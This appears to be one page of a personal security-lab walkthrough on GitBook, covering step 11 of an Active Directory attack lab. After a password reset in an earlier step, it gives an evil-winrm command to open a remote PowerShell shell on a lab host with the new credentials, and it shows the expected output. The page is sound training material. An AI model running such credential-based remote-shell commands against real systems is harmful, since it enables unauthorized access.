Whoami
  • Welcome
  • Home Lab: C2 Detection, Ransomware Defense & YARA Automation
    • SOC Lab – What is this Lab about ?
    • Part 1 - Setting Up the Environment
    • Part 2 - Detecting C2 Activity
    • Part 3 - Credential Dumping & Threat Detection
    • Part 4 - Blocking Ransomware
    • Part 5 - Reducing False Positives
    • Part 6 - Automated YARA Scanning
  • Automation Lab - Home Project
    • Sysmon Installation
    • Wazuh & TheHive: Installation, Configuration, and Optimization
    • Tracking Mimikatz Activity with Wazuh & Sysmon Logs
    • End-to-End Alert Automation: Wazuh → Shuffle → TheHive
  • Active Directory Attack Lab: Recon-to-Root
    • Reconnaissance Phase
      • 1. Full TCP Port Scan on Target Host
      • 2. Service and Version Detection
      • 3. Null Session SMB Enumeration
      • 4. LDAP Anonymous Bind Check
      • 5. Kerberos Username Enumeration
      • 6. Password Brute Force via SMB Login
    • Exploitation Phase
      • 7. Dump Domain Information via LDAP
      • 8. Perform Remote AD Recon with BloodHound
      • 9. Set Up Neo4j and Launch BloodHound GUI
      • 10. Abuse ForceChangePassword Right via RPC
      • 11. Validate New Credentials via WinRM
      • 12. Enumerate Local Privileges and AutoLogon
      • 13. Reuse Administrator Credentials
      • 14. Capture the User Flag
  • QRadar101 Lab Challenge
    • Scenario and Instructions
    • The Walkthrough
Powered by GitBook
On this page
  1. Active Directory Attack Lab: Recon-to-Root
  2. Exploitation Phase

11. Validate New Credentials via WinRM

Previous10. Abuse ForceChangePassword Right via RPCNext12. Enumerate Local Privileges and AutoLogon

Last updated 24 days ago

Now that you've reset the password for sysadmin, you can try to get a remote shell using WinRM.

Test the new credentials over WinRM, a Windows remote shell. This gives full command-line access to the target.

Command:

evil-winrm -i 192.168.10.4 -u 'sysadmin' -p 'NewPassword123'

✅ If successful:

You’ll get a PowerShell prompt like:

PS C:\Users\sysadmin>

Then type:

whoami

Expected output:

megachange\sysadmin

That confirms full access as sysadmin on the machine .